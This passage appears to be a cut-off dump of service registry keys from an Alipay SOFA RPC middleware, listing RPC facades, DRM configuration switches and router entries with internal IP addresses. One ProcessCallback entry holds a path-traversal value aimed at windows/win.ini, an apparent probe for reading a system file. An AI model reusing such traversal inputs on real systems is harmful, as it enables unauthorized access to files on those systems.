FAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ticket_transmission_parent_rr_rpc_service2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.biz.activity.message.TransactionEventHandlerTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantContactPersonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.core.service.cashforecast.engine.CashForecastTaskEngine:1.0:commonTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo-yihuan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkloanbillcore.common.service.facade.bill.api.LbcBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.drm.PortfolioCoreCommondDrm.portfolioRecaculateData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.codec.repository.cache.CodeScanningRuleCache:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.137.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.open.OpenRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.UserGroupFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findecision.common.service.facade.plugin.HistoricalCommandService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquery.common.service.api.InsDebtQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.biz.service.commission.api.CommissionTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkrdfast.common.service.facade.ApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.chargeSwitchToRating,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchpunish.facade.punish.PunishQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.rcpSupportSubTypeScenes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSellerInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.esp.hbase.interfaces.endpoint.facade.rest.ZookeeperRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.crmhome.common.service.facade.api.discount.DiscountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinworks.common.service.facade.cicada.IfinworksCicadaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.NasDataCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.SignIdentityCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.qrcode.QrCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.activeservice.ActiveServiceFloatLayerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.serviceFavourRecomCompletionCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.auth.AuthService:1.0:authcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.checkBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.reloadRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ZSKYNET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwd4716.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.SchemaZoneRulePrivateApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.t7701.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.biz.service.impl.rpc.training.TrainingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tntInst.TntInstApproverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.arMsgConfigByPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.144.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_SMART#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finslip.pcconfigread.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcredittrans.facade.baitiao.api.BtctransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.LogonPasswordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antinvoice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.biz.iam.service.DistrictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.LCSCallOutHistoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:airprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataquery.common.service.facade.hbase.FinSupergwHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTtcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lego.common.service.facade.abnormalMotion.AbnormalMotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstm.common.service.facade.django.FileManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.FinChannelQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.UserOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.riskctrl.common.service.mng.DimensionManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.common.service.facade.management.KatongCmsQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.chargeAdaptorSwitchRating,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:zmcreditmng_grayCateRule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.schema.StatisticsInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.face.ScenicBizContractBackyardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcratecenter.service.facade.api.FcQuoteCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.bankcardTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilequest.common.service.facade.quest.QuestProgressQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.199.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.cfmng_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.finpwm.FinpwmCapitalTestFacadeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.InsPolicyInvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:almcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.manager.ActiveServiceRecordManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:trafficcardsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.policyUpdateToSupportContinuous,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rest.restful.LineageGroupCallbackRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dt.onedata.dwm.client.version.AtomIndexVersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.76.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echannelcenter.common.service.facade.callback.MergeInstCallback:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mytradeapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.RiskMngCoreServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.116.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.QueryMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.reservecenter.facade.api.OuterInstructionConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcp.service.facade.kb.record.KbRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acnotifycore.common.service.facade.AppTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.basementweb.facade.GrayCoverageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revmng.common.service.facade.RevmngTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.FacepaySwitchFacade:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.common.service.facade.api.DigitalCoinQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.pcldNoRetryErrorCodesByLoanSchemeType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pkgcore.common.service.facade.PackageQueryForMobileFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.dingtalk.DingtalkService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbodmp.common.service.facade.api.effect.CityGridFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:staffBasicSalayConfigDownloadCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.stepcounter.StepCounterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.182.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.biz.service.impl.rpc.tmlife.TmLifeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.runtime.service.integration.ocr.OcrVehiclePlateFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.50.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certifymng.revolmng.service.facade.VersionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcinstdata.common.service.facade.service.orgconfig.PcinstRTConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cscenter.service.worktask.facade.CsWorkTaskManageService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fcbuservice.common.service.facade.manager.DepartmentManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.application:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:clockBasicContentDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.rundatatair.RundataTairService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.EtcDistributePlanTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finqaunion.common.service.facade.tree.BusinessTreeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.228.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:trsbrain-degradecure@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.malgo.common.facade.PromoMatchServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.forceCompensateStarData,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.yfd.common.service.facade.ds.DataSetPublishServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_ALPLATFORM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.sync.ProductDataCalcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.OffsetContactsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.expandYearsWithT,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.GuardianTaskDefineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.etetestcore.service.api.PeerPayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_bpayCorrectAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.cifin.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mpromocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.MftransBalanceQueryDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.relation.RelationInfoManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@findatacanal#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.73.166.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:mfinwormhole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socialcore.facade.taskcenter.TaskApplyOrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.commandcenter.service.facade.api.AcpProjectGTasksFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.query.FinecoriskRecordCountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/\\\\\\\\\\\\..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:checkservice-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imemberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.resendZongshuSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.RoleQueryFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AlipayAccountMonitorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.integrationStopAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.insure.drm.GiftInsuranceInsureDRM.stopInsure,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.StarWishUnitedDrm.modifyStarWishRecord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.xview.console.common.service.facade.MetadataServiceFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.133.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.facade.partner.PartnerFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_R_PCCO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@adatabus#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fincommontaskhub.service.facade.console.EnvServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bklid.facade.api.BklidCtrlRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.DownloadurlSwitchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.echo:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:instpayAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.158.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finriskmngcore_commonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.ExpDocCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.trade.test.YebEventServiceAutomatedTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSSCENEMARKET#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:govbizwebdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.EntAccInfoInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-alipaypointcust-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecommunity.common.service.facade.CommunityMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.changerequirement.facade.spi.ChangeIterationAsyncCheckSpi:1.0:ichecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.antcloud.MiniAppAntCloudOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.cloud.osp.console.openapi.OspOpenAPIConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iopencore.common.service.manager.EnumValueDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.fengdieApiUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.bumng.common.service.facade.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rccenter.common.service.facade.api.RccenterFileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cicada.common.service.facade.api.operation.OperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insxhbprod.common.service.facade.ShowEntranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianquery.common.service.api.InsPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.common.facade.application.AppManager#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mshopcenter.common.service.facade.api.ShopRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundAbnormalLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.UserAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecsa.common.service.facade.mutualtask.MutualtaskCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.BizOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.biz.service.review.ReviewPlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapters